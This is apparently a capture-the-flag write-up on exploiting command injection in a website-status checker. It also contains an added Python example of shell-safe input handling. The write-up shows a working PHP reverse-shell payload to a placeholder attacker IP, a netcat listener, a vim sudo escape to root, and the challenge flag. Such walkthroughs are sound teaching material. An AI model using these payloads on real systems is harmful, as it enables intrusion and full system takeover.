We are given a site where we can check the status of websites.
Entering a valid URL such as https://google.com returns the HTTP status code, as seen in the following screenshot.
Entering a semicolon (;) breaks the command, which indicates that our input is passed to a shell. Using the payload ; whoami, we are returned www-data as our user, as seen in the following screenshot.
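The semicolon behaviour above is what happens when user input is concatenated into a shell command line. The following is an added example, not the challenge's source code: it assumes the checker shells out to curl (the function names and the curl invocation are hypothetical), shows how a shell would split the resulting line without executing anything, and builds a validated argv list meant to be run without a shell.

```python
import re
import shlex
from urllib.parse import urlsplit

# Assumed vulnerable pattern (hypothetical, not the challenge's code):
# user input is concatenated into a command line that a shell will parse.
def vulnerable_cmdline(user_input):
    return "curl -s -o /dev/null -w '%{http_code}' " + user_input

def commands_seen_by_shell(cmdline):
    """Tokenize like a POSIX shell and split on ';' to list the separate
    commands a shell would run. Nothing is executed."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands

HOST_RE = re.compile(r"[A-Za-z0-9.-]+")  # DNS names and IPv4 only

def safe_argv(user_input):
    """Validate the URL and return an argv list meant to be run without a
    shell, e.g. subprocess.run(safe_argv(url), shell=False, timeout=10)."""
    if any(c.isspace() or ord(c) < 0x20 for c in user_input):
        raise ValueError("whitespace and control characters are rejected")
    parts = urlsplit(user_input)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http and https URLs are accepted")
    if not parts.hostname or not HOST_RE.fullmatch(parts.hostname):
        raise ValueError("missing or malformed host name")
    # '--' ends option parsing, so the URL can never be read as a curl flag.
    return ["curl", "-s", "-o", "/dev/null", "-w", "%{http_code}",
            "--max-time", "5", "--proto", "=http,https", "--", user_input]

if __name__ == "__main__":
    # Constructed sample inputs: a normal URL and the probe from the text.
    for sample in ("https://google.com", "; whoami"):
        print(sample, "->", commands_seen_by_shell(vulnerable_cmdline(sample)))
        try:
            print("  argv:", safe_argv(sample))
        except ValueError as err:
            print("  rejected:", err)
```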
We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be nc -nlvp 45101 as seen in the following screenshot.
Once it is listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-ADDRESS" with your IP address.
; php -r '$sock=fsockopen("YOUR-IP-ADDRESS",45101);exec("/bin/sh -i <&3 >&3 2>&3");'
Input the above payload into the input box as seen in the following screenshot.
Click on "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell, as seen in the following screenshot.
We can spawn an interactive shell using the command script -qc /bin/bash /dev/null. Once done, we can explore the system. We can use the command sudo -l and see that we can run the command vim as root without a password as seen in the following screenshot.
Using GTFOBins, we are able to break out and obtain a shell as the root user using the following command:
vim -c ':!/bin/sh'
Using the command whoami we can see that we are now the root user as seen in the following screenshot.
We can obtain the flag in the root directory by using the command cd /root and cat flag.txt. The flag is HEX{N3tw0rK_ErR_500_W1kS2kKiL}.






